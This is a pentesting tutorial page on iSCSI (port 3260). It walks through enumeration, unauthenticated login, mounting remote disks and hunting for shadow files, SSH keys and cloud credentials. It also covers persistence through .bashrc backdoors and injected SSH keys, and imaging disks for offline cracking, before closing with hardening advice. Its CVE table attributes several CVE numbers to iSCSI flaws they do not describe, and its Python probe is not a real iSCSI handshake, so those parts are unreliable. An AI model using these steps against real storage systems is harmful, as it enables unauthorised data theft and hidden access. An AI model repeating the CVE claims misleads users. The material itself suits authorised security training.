# iScsi - Port 3260

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
  {% endtab %}
  {% endtabs %}

## What is iSCSI and Why is it Important?

**iSCSI (Internet Small Computer Systems Interface)** is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in **SAN (Storage Area Network)** environments for **centralized disk management** and **remote storage access**.

#### Why iSCSI Matters in Security:

* **High-value targets**: iSCSI often connects to critical infrastructure like databases and VMs.
* **Misconfigurations** can lead to **unauthenticated access** or **credential leaks**.
* **Exposed iSCSI services** can reveal disk images, file systems, and even credentials.

***

## How iSCSI Works on Port 3260

Port **3260** handles the **iSCSI target communication**, where:

* **Initiators** (clients) request access to storage blocks.
* **Targets** (servers) expose storage resources via Logical Unit Numbers (LUNs).

#### iSCSI Protocol Flow:

1. **Session Initiation** via iSCSI login.
2. **Discovery Phase**: Client requests list of available targets.
3. **Authentication**: Optional but often skipped or weakly implemented.
4. **Data Transfer**: SCSI commands are encapsulated in TCP/IP.

***

## Top Vulnerabilities in iSCSI

Below are common attack vectors in iSCSI deployments:

| Vulnerability                | Description                                                    |
| ---------------------------- | -------------------------------------------------------------- |
| **No Authentication**        | Default config allows any initiator to access targets.         |
| **Weak CHAP Credentials**    | Often reused or stored in plaintext.                           |
| **Information Disclosure**   | Target names, volume names, and paths can leak sensitive info. |
| **Exposure to the Internet** | Misconfigured firewalls or open 3260 ports.                    |
| **Unpatched CVEs**           | Older storage devices may run vulnerable firmware.             |

***

## Enumeration Techniques with Tools (Nmap, Netcat, etc.)

#### Using Nmap

```bash
nmap -p 3260 -sV -Pn <target-ip> --script=iscsi-info
```

* **`-p 3260`**: Scan the iSCSI port
* **`--script=iscsi-info`**: Attempts to extract target name and LUNs

#### Netcat for Banner Grabbing

```bash
nc <target-ip> 3260
```

* You may get a raw iSCSI response showing protocol version or session response.

#### iscsiadm (Linux)

```bash
iscsiadm -m discovery -t sendtargets -p <target-ip>
```

* Lists available iSCSI targets.
* Works only if no auth is required or credentials are known.

***

## Manual Exploitation: Hands-On Examples

### Step 1: Target Discovery

```bash
iscsiadm -m discovery -t sendtargets -p 10.10.10.22
```

Output:

```
10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1
```

### Step 2: Login Without Authentication

```bash
iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login
```

If successful, the system will map the remote disk locally (e.g., `/dev/sdb`).

### Step 3: Mount and Explore

```bash
fdisk -l
mount /dev/sdb1 /mnt
ls /mnt
```

Look for:

* `/etc/shadow` files
* Password backups
* SSH keys
* Configs containing internal IPs

***

## Automated Exploitation with Tools

### Metasploit iSCSI Modules

Metasploit has auxiliary modules for discovery:

```bash
msfconsole
use auxiliary/scanner/iscsi/iscsi_version
set RHOSTS <target-ip>
run
```

### Nikto (Limited)

While **Nikto** isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices.

### Custom Python Script Example

```python
import socket

target = "10.10.10.22"
port = 3260

s = socket.socket()
s.connect((target, port))
s.send(b"InitiatorHello")
print(s.recv(1024))
s.close()
```

***

### Real-World CVEs and Notable Exploits

| CVE ID               | Description                                                 | Link                                                     |
| -------------------- | ----------------------------------------------------------- | -------------------------------------------------------- |
| **CVE-2020-2732**    | iSCSI memory leak in certain Linux kernels                  | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-2732)    |
| **CVE-2015-1420**    | iSCSI stack buffer overflow in Netgear ReadyNAS             | Exploit DB                                               |
| **CVE-2018-1000861** | Remote command execution via iSCSI web management interface | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000861) |

***

### Privilege Escalation Opportunities via this Service

Once access is gained to an iSCSI volume:

* **Look for saved credential files**
  * `.bash_history`, `.ssh/id_rsa`, `/etc/shadow`
* **Search for sudoers misconfigurations**

  ```bash
  cat /mnt/etc/sudoers
  ```
* **Enumerate LVM volumes** for hidden partitions

  ```bash
  lvscan
  ```

If LUNs expose full disk images, mount them locally and search for:

* **SAM/NTDS.dit (Windows)**
* **MySQL databases**
* **AWS credentials**

***

### Post-Exploitation Tips and Persistence

#### Techniques:

* **Leave a backdoor in iSCSI shared volume**
  * e.g., `.bashrc` modification
* **Enable remote access via hidden SSH key**
  * Inject key into `/home/user/.ssh/authorized_keys`
* **Exfiltrate disk image for offline cracking**

  ```bash
  dd if=/dev/sdb of=disk.img bs=1M
  ```

***

### Defense, Mitigation, and Hardening Techniques

#### Best Practices:

* **Always enable CHAP authentication**
* **Whitelist initiator IPs**
* **Limit access with firewall rules (block 3260 externally)**
* **Use VLANs or separate subnets for SAN traffic**
* **Regularly patch iSCSI daemons and firmware**

#### Monitoring Tips:

* Use **Wireshark** to inspect unauthorized iSCSI sessions.
* Set up **Syslog alerts** for unusual discovery requests.

***

### 📚 Recommended Books&#x20;

#### [The Hacker Playbook 3: Practical Guide To Penetration Testing](https://shop.verylazytech.com/l/TheHackerPlaybook3)

> A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers.

***

{% hint style="success" %}
Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚

</details>
{% endhint %}